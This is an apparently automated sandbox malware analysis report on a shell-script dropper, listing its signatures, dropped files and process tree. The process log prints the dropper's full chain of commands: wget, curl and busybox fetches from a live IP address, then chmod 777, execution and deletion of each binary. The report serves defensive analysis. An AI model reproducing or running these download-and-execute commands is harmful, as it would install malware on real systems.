Malware Analysis Report

2025-04-03 19:45

Sample ID 241029-cs1lassfld
Target 562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh
SHA256 562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f

Threat Level: Shows suspicious behavior

The file 562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-29 02:21

Signatures

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-29 02:21

Reported

2024-10-29 02:23

Platform

debian9-mipsel-20240226-en

Max time kernel

131s

Max time network

136s

Command Line

[/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
N/A /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
N/A /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i N/A
N/A /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F N/A
N/A /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E N/A
N/A /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
N/A /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby N/A
N/A /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA N/A
N/A /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D N/A
N/A /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif N/A
N/A /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
N/A /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe N/A
N/A /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK N/A
N/A /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 N/A
N/A /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i N/A
N/A /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F N/A
N/A /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E N/A
N/A /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
N/A /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby N/A
N/A /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA N/A
N/A /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D N/A
N/A /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif N/A
N/A /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
N/A /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe N/A
N/A /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK N/A
N/A /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 N/A
N/A /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
N/A /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /usr/bin/curl N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /usr/bin/curl N/A
File opened for modification /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /usr/bin/curl N/A
File opened for modification /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /usr/bin/curl N/A
File opened for modification /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /usr/bin/curl N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /usr/bin/curl N/A
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /usr/bin/curl N/A
File opened for modification /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /usr/bin/curl N/A
File opened for modification /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /usr/bin/curl N/A
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /usr/bin/curl N/A
File opened for modification /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /usr/bin/curl N/A
File opened for modification /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /usr/bin/curl N/A
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /usr/bin/curl N/A
File opened for modification /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /usr/bin/curl N/A
File opened for modification /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /usr/bin/curl N/A
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /usr/bin/curl N/A
File opened for modification /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /usr/bin/curl N/A
File opened for modification /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /usr/bin/curl N/A
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /usr/bin/curl N/A
File opened for modification /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /usr/bin/curl N/A
File opened for modification /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /usr/bin/curl N/A
File opened for modification /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /usr/bin/curl N/A
File opened for modification /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /usr/bin/curl N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /usr/bin/curl N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /usr/bin/curl N/A
File opened for modification /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /usr/bin/curl N/A
File opened for modification /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /usr/bin/curl N/A
File opened for modification /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /usr/bin/curl N/A

Processes

/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh

[/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/chmod

[chmod 777 b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

[./b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/rm

[rm b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/wget

[wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/chmod

[chmod 777 V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj

[./V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/rm

[rm V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/wget

[wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/chmod

[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i

[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/rm

[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/wget

[wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/chmod

[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F

[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/rm

[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/wget

[wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/chmod

[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E

[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/rm

[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/wget

[wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/chmod

[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV

[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/rm

[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/wget

[wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/chmod

[chmod 777 NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby

[./NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/rm

[rm NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/wget

[wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/chmod

[chmod 777 LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA

[./LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/rm

[rm LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/wget

[wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/chmod

[chmod 777 yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D

[./yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/rm

[rm yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/wget

[wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/chmod

[chmod 777 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif

[./5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/rm

[rm 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/wget

[wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/chmod

[chmod 777 GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb

[./GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/rm

[rm GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/wget

[wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/chmod

[chmod 777 pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe

[./pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/rm

[rm pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/wget

[wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/chmod

[chmod 777 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK

[./4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/rm

[rm 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/wget

[wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/chmod

[chmod 777 NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68

[./NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/rm

[rm NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/wget

[wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/chmod

[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i

[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/rm

[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/wget

[wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/chmod

[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F

[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/rm

[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/wget

[wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/chmod

[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E

[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/rm

[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/wget

[wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/chmod

[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV

[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/rm

[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/wget

[wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/chmod

[chmod 777 NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby

[./NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/rm

[rm NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/wget

[wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/chmod

[chmod 777 LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA

[./LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/rm

[rm LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/wget

[wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/chmod

[chmod 777 yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D

[./yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/rm

[rm yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/wget

[wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/chmod

[chmod 777 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif

[./5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/rm

[rm 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/wget

[wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/chmod

[chmod 777 GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb

[./GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/rm

[rm GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/wget

[wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/chmod

[chmod 777 pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe

[./pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/rm

[rm pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/wget

[wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/chmod

[chmod 777 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK

[./4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

